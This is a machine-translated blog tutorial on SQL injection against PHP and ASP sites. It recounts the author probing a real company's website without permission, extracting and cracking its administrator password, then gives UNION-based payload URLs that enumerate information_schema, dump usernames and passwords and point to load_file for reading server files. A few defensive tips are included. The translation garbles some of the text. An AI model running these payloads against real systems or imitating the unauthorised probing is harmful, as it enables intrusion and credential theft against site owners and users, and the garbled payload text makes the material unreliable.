Summary of some SQL injection methods in php

SQL injection is to use your syntax or accept some bugs in data processing to crack the database, and then download your data or directly obtain your administrator to access some operations that affect the website, but in SQL injection, we have some bugs for people to use. The following small series collect some preliminary and slightly advanced methods, and only learn and reference them. Other methods will not work.

Basic SQL injection vulnerability Methods

This morning, the School held a meeting to talk about arrangements for graduation internships and design. It also showed that there was a company to recruit, ask interested people to log on to their company's website. Paperen I certainly didn't have this interest, but the dormitory's Xiaohua students were a little interested. When I came back, I went to their website. But ......?

Paperen also gave me a few eyes. What's wrong with the website? asp, I don't know why I suddenly wanted to step on it and see if there was any SQL injection vulnerability and they got onto their website, after reading several pages, go to the company news. Is there a news url xwzx_content.asp? Id = 456 (normally, the database is queried Based on the id value and the corresponding data is displayed. It is also reasonable), ......?

Paperen I changed the parameter to xwzx_content.asp? Id = 456 and 1 = 1. I tried it and found that it is the same as id = 456. (Does not prove whether the vulnerability exists )?

Then try again

The Code is as follows:	Copy code
Xwzx_content.asp? Id = 456 and '1' = '1

The result is

If an error is prompted, the vulnerability can be determined because you can find a table in your database to try this statement?

Select * from table where id = 1 and 1 = 1 (id of a record). In fact, adding and 1 = 1 is the same as not adding, because 1 = 1 is true, SQL can certainly be executed in the past, but if you are 1 = 2, it will not work, because obviously 1 is not equal to 2, is false, so no data is found .?

Then proceed to construct the statement xwzx_content.asp? Id = 456 or 1 = 1. The result is

The result is also obvious, because the result of 1 = 1 (true) on or is true. Whether your ID number is 456 or not, all data records will be found .?

From the above operations, I confirmed that the SQL injection vulnerability exists on this page. The following is the official injection of the information we want to get. It mainly depends on your RP .?

We need to use union to query the management password and account. Of course, the premise is that you have to guess the name of the Administrator table .?

My first thought of paperen is the administrator. Try it.

1. xwzx_content.asp? Id = 456? Union select? * The result of the from administrator is

If the number of fields does not match, Let's guess the number of fields.

1. xwzx_content.asp? Id = 456? Union select? Result 1, 2, 3, 4, 5, 6 from administrator:

It seems that it is correct. There are 10 fields in this table, 4 of which will be displayed on the page. Maybe you don't quite understand what is going on here. paperen I may wish to release one of my own mysql instances.

1. the SQL command is SELECT * FROM 'paper _ blog 'WHERE id = 1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 FROM member
?

Let's see 1, 2, 3, 4, and 5 in the second line. I understand it myself. I don't know if the union query has been used, simply put, all the data in other tables is queried .?

Let's guess the name of the field where he put the administrator account.

1. xwzx_content.asp? Id = 456? Union select? Result 1, 2, 3, name, 5, 6 from administrator:

This proves that he guessed it wrong. He continued to call it the administrator.

The Administrator's account is the administrator, and then the password is cracked.

1. xwzx_content.asp? Id = 456? Union select? 1, 2, 3, password, 5, 6 from administrator result is

The password is 32-bit and should be MD5 encrypted. ctrl + c: Click it to check the MD5 encryption on some websites online. The password is actually an administrator ...... This security awareness is too bad, right .?

What is the difference between an account and a password? Obviously, it is the background address, but I still cannot find the paperen address. I am not sure if you are a little disappointed, I want to post a blog post, so I will not take the time to touch it. My impression on this website is that it is not very good. Isn't that difficult for the company .?

In fact, it is not very easy to intrude into a website. It is not easy to defend against intrusions. But from the above, we can see some ideas to prevent such low-level errors .?

1. Filter and Judge parameters of get Parameters

2. Do not create your own database by referring to the database tables or table names of some open-source programs.

3. Use a complex password, at least not an administrator, Administrator 888 or the like.

4. It is best to change the folder name for storing background files to a special one, so it is not easy to guess.

5. It is best to change the database file Suffix of the asp Website to asp to prevent download?

Slightly more advanced SQL Injection

Remember the SQL statement written in "are you processing data from $ _ GET like this,

The Code is as follows:	Copy code
1. $ SQL = 'select * from goods where id = '. $ id;

It is clear in that article that the problem caused by not filtering the incoming data or even not using single quotation marks, if you can guess other tables in the database, you can also find the contents of other tables. This time, paperen wants to talk about more advanced techniques for using this vulnerability.

If you have already confirmed the vulnerability, how can you prove it? To put it simply, change the parameter to id = 1 = 1 and id = 1 = 2. Then you can check the page to see if the vulnerability exists. If the display information is different or an error occurs, it indicates that the vulnerability exists ), however, even if the vulnerability is confirmed, you cannot guess the table names of other tables. Use an evil trick to first release the injected URL.

Current Database Name

1. URL:

The Code is as follows:	Copy code
Http: // localhost/mytest/sqlinject /? Id =-1 + UNION + select + 1, 2, 3, database (), 5, 6, 7, 8, 9 + from + information_schema.columns2. SQL: SELECT * FROM goods WHERE id =-1 UNION SELECT 1, 2, 3, DATABASE (), 5, 6, 7, 8, 9 FROM information_schema.columns

After obtaining the hex Value of the database test, the table name (obtain the hex value of the test select hex ('test') in the database test) is displayed in mysql, 74657374 plus 0x, hexadecimal number)

1. URL:

The Code is as follows:	Copy code
Http: // localhost/mytest/sqlinject /? Id =-1 + UNION + SELECT + 1, 2, 3, GROUP_CONCAT (DISTINCT (table_name), 5, 6, 7, 8, 9 + FROM + information_schema.columns + AS + c + WHERE + c. table_schema = 0x746573742. SQL: SELECT * FROM test. goods WHERE id =-1 union select 1, 2, 3, GROUP_CONCAT (DISTINCT table_name), 5, 6, 7, 8, 9 FROM information_schema.columns AS c WHERE c. table_schema = 0x74657374

Then, put the hex Value of the table user to check the field of the user table. It is DISTINCT (column_name) now, it is best to add and. If there is more than one database with a user table, the possible results will mislead you.

1. URL:

The Code is as follows:

Copy code

Http: // localhost/mytest/sqlinject /? Id =-1 + UNION + SELECT + 1, 2, 3, GROUP_CONCAT (DISTINCT (column_name), 5, 6, 7, 8, 9 + FROM + information_schema.columns + WHERE + table_name = 0x75736572 + AND + TABLE_SCHEMA = 0x746573742. SQL: select * from goods where id =-1 UNION SELECT 1, 2, 3, GROUP_CONCAT (DISTINCT (column_name), 5, 6, 7, 8, 9 FROM information_schema.columns WHERE table_name = 0x75736572 AND TABLE_SCHEMA = 0x74657374

You see! We have obtained the information we want step by step, doesn't it mean? So paperen said this kind of stuff is addictive.

Then, the clear code of the user table is displayed.

The Code is as follows:	Copy code
URL: http: // localhost/mytest/sqlinject /? Id =-1 + UNION + SELECT + 1, password, 3, username, 5, 6, 7, 8, 9 + FROM + user2. SQL: select * from goods where id =-1 UNION SELECT 1, password, 3, username, 5, 6, 7, 8, 9 FROM user

But there may be more than one user data in the user table, so add limit.

The Code is as follows:	Copy code
1. URL: http: // localhost/mytest/sqlinject /? Id =-1 + UNION + SELECT + 1, password, 3, username, 5, 6, 7, 8, 9 + FROM + user + limit + 1, 12. SQL: select * from goods where id =-1 UNION SELECT 1, password, 3, username, 5, 6, 7, 8, 9 FROM user limit 1, 1

Then take the obtained Password
Obtain the clear code for cracking, and then know the background path. Use the user account and password to log on to the background. However, the two steps after paperen are also based on your character. If the password is complicated, you have to find the background address even if it is cracked. So ...... So far. Just entertain yourself. (PS: You can also use load_file to get some file content on the server, provided that you have to guess the file path)